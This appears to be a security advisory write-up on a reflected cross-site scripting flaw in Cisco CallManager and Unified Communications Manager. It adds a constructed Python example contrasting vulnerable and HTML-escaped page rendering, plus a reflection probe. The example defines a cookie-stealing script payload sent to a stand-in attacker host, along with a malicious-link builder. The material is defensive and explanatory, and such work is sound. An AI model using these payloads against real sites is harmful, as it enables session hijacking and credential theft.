Cisco CallManager releases prior to 3.3(5)sr2b and prior to 4.1(3)sr5, and Cisco Unified Communications Manager releases prior to 4.2(3)sr2 and prior to 4.3(1)sr1, contain a reflected cross-site scripting vulnerability that could allow an unauthenticated, remote attacker to bypass security restrictions and run arbitrary script in the browser of a user of the affected web interface.
The vulnerability exists because parameter values supplied in URLs are not sufficiently sanitized before the web interface echoes them back into the page it returns to the user. An unauthenticated, remote attacker could exploit it by convincing a user to follow a crafted link whose parameter values contain HTML or script; because the values are reflected unencoded, the attacker's HTML or script code would execute in the user's browser session in the security context of the affected site, with whatever access that session has. The attack requires user interaction (the victim must follow the link) and only the pages that reflect unsanitized parameters are exposed.
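The pattern described above, shown as an added example that is not Cisco's code and does not model any real CallManager page: a page that echoes a URL query parameter straight into HTML (the flawed pattern), the same page with the value HTML-encoded before it is returned (the fix), the kind of link an attacker would send, and the harmless reflection probe a tester runs to tell the two apart. The parameter name `q`, the host names, and the page layout are assumptions for illustration.

```python
"""Reflected XSS from an unsanitized URL parameter, vulnerable vs hardened.

Constructed illustration only; the parameter name 'q', the hosts and the
page markup are assumptions and do not correspond to any Cisco product page.
"""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed attacker payload: exfiltrates the session cookie to a host the
# attacker controls (.invalid TLD so it can never resolve).
PAYLOAD = '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>'

# Constructed, harmless probe marker a tester injects to check for reflection.
PROBE = '"><xss-probe-1>'


def query_param(url: str, name: str, default: str = "") -> str:
    """Return the first value of query parameter `name` from `url`."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [default])[0]


def render_vulnerable(url: str) -> str:
    """Flawed pattern: the parameter is interpolated into the page as-is."""
    q = query_param(url, "q")
    return f"<html><body><p>Results for: {q}</p></body></html>"


def render_hardened(url: str) -> str:
    """Fixed pattern: the parameter is HTML-encoded (including quotes) first,
    so '<', '>', '&', '"' and "'" can no longer break out of the text node."""
    q = html.escape(query_param(url, "q"), quote=True)
    return f"<html><body><p>Results for: {q}</p></body></html>"


def malicious_link(base: str) -> str:
    """Build the link an attacker would send to a victim; urlencode percent-
    encodes the payload so it survives transport and is decoded by the server."""
    return f"{base}?{urlencode({'q': PAYLOAD})}"


def reflected_unescaped(body: str, marker: str) -> bool:
    """True if `marker` appears verbatim in the response body, i.e. the
    parameter was reflected without encoding."""
    return marker in body


def probe(render, base: str) -> bool:
    """Tester's check: request the page with a unique marker in the parameter
    and report whether it comes back unencoded. `render` stands in for the
    HTTP round trip so the example runs offline."""
    body = render(f"{base}?{urlencode({'q': PROBE})}")
    return reflected_unescaped(body, PROBE)


if __name__ == "__main__":
    base = "http://pbx.example/search"  # assumed URL, not a real endpoint
    link = malicious_link(base)
    print("attacker link:", link)
    print("vulnerable page reflects payload:",
          reflected_unescaped(render_vulnerable(link), PAYLOAD))
    print("hardened page reflects payload:",
          reflected_unescaped(render_hardened(link), PAYLOAD))
    print("probe vulnerable:", probe(render_vulnerable, base))
    print("probe hardened:", probe(render_hardened, base))
```

Against a real target the probe would be an HTTP request with the marker in each parameter of each page that echoes input, and the check is whether the marker's `<`, `>` and `"` come back as-is or as `&lt;`, `&gt;` and `&quot;`.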
Cisco confirmed this vulnerability in a security advisory and released updated software; the fixed releases are 3.3(5)sr2b and 4.1(3)sr5 for CallManager and 4.2(3)sr2 and 4.3(1)sr1 for Cisco Unified Communications Manager, so administrators should verify that each system runs at least the fixed release of its own train.